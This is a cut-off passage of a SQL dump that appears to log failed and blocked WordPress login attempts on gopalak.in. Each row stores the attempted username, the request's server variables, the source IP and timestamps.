10:08:13'),(95205,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52505\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746844648.4171951;s:12:\"REQUEST_TIME\";i:1746844648;}}','35.154.1.88',1,'2025-05-10 08:07:30','2025-05-11 10:08:13'),(95206,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45428\";s:11:\"REMOTE_ADDR\";s:12:\"51.38.119.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746844736.395793;s:12:\"REQUEST_TIME\";i:1746844736;}}','51.38.119.44',0,'2025-05-10 08:08:57','1970-01-01 00:00:00'),(95207,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58610\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.219.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746845289.951673;s:12:\"REQUEST_TIME\";i:1746845289;}}','157.230.219.118',0,'2025-05-10 08:18:11','1970-01-01 00:00:00'),(95208,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62227\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746845368.1528759;s:12:\"REQUEST_TIME\";i:1746845368;}}','35.154.1.88',1,'2025-05-10 08:19:29','2025-05-11 10:08:13'),(95209,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62218\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746845368.1557851;s:12:\"REQUEST_TIME\";i:1746845368;}}','35.154.1.88',1,'2025-05-10 08:19:29','2025-05-11 10:08:13'),(95210,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62221\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746845368.1567891;s:12:\"REQUEST_TIME\";i:1746845368;}}','35.154.1.88',1,'2025-05-10 08:19:29','2025-05-11 10:08:13'),(95211,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62217\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746845368.1528759;s:12:\"REQUEST_TIME\";i:1746845368;}}','35.154.1.88',1,'2025-05-10 08:19:29','2025-05-11 10:08:13'),(95212,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62228\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746845369.8741469;s:12:\"REQUEST_TIME\";i:1746845369;}}','35.154.1.88',1,'2025-05-10 08:19:31','2025-05-11 10:08:13'),(95213,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39972\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.68\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746845847.3733521;s:12:\"REQUEST_TIME\";i:1746845847;}}','198.54.126.68',0,'2025-05-10 08:27:29','1970-01-01 00:00:00'),(95214,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51292\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846095.6557391;s:12:\"REQUEST_TIME\";i:1746846095;}}','35.154.1.88',1,'2025-05-10 08:31:38','2025-05-11 10:08:13'),(95215,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51290\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746846095.655184;s:12:\"REQUEST_TIME\";i:1746846095;}}','35.154.1.88',1,'2025-05-10 08:31:38','2025-05-11 10:08:13'),(95216,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51293\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUES